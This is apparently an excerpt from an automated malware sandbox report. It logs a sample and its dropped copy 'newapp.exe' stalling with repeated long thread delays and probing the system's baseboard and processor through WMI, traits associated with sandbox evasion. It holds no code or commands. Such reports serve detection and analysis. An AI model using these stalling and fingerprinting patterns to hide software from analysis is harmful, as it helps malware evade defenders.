Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594327
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594208
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594094
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 593985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 593860

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6652	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3038	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Window / User API: threadDelayed 2457	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Window / User API: threadDelayed 7313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 3315	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 6264	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 8175
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 1637

Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7852	Thread sleep count: 2457 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7852	Thread sleep count: 7313 > 30	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599753s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599168s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598951s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598487s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598349s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595732s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595285s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594700s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594251s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -594016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe TID: 7848	Thread sleep time: -593906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7328	Thread sleep count: 3315 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7328	Thread sleep count: 6264 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599434s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599325s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -599214s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598884s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598655s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596162s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7292	Thread sleep time: -594187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 6968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7744	Thread sleep count: 8175 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7744	Thread sleep count: 1637 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594437s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594327s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594208s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -594094s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -593985s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep time: -593860s >= -30000s

Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599753	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599280	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598951	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598842	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598487	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598349	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595732	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595285	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594700	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594251	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000	Jump to behavior
